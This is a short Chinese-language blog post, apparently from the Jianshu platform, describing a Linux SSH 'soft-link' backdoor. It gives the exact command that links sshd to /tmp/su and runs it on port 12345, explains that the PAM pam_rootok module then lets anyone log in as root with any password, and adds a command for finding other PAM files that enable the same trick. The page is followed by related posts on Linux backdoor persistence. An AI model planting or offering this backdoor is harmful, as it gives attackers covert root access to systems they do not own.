linux后门

软链接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345

ssh启用了PAM,用到了pam_rootok模块

同样还具有pam_rootok模块的文件还有

find /etc/pam.d/ | xargs grep "pam_rootok"

同样,你复制改名了,软连接调用了也可以生效.

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Linux后门的几种姿势
    转载自 https://evilanne.github.io/2017/08/26/Linux%E5%90%8E%...
    烤土豆啦阅读 4,453评论 0 10
  • Linux后门维系(二)
    先推荐下我最喜欢的Linux后门系列文章,在我的收藏夹里藏了好久了,来自奇安信的公众号。 《红队实战攻防技术分享:...
    RabbitMask阅读 1,165评论 0 7
  • linux后门维系
    信息搜集 以下为虚拟机效果: w/who显示目前登入系统的用户信息 无痕终端操作 执行完成后当前终端所有操作不被记...
    RabbitMask阅读 942评论 0 6
  • Linux知识点捡拾
    基础命令 为了在 sudo 中设置权限提升,您需要编辑 sudoers 文件。 你不应该直接编辑文件,而是使用:s...
    米开朗基乐阅读 1,952评论 0 5
  • 权限维持 | SSH软链接后门
    01 后门命令 经典后门:对sshd建立软链接,即可使用任意密码登录。 1、创建后门 ln -sf /usr/sb...
    安全小白团阅读 3,028评论 0 1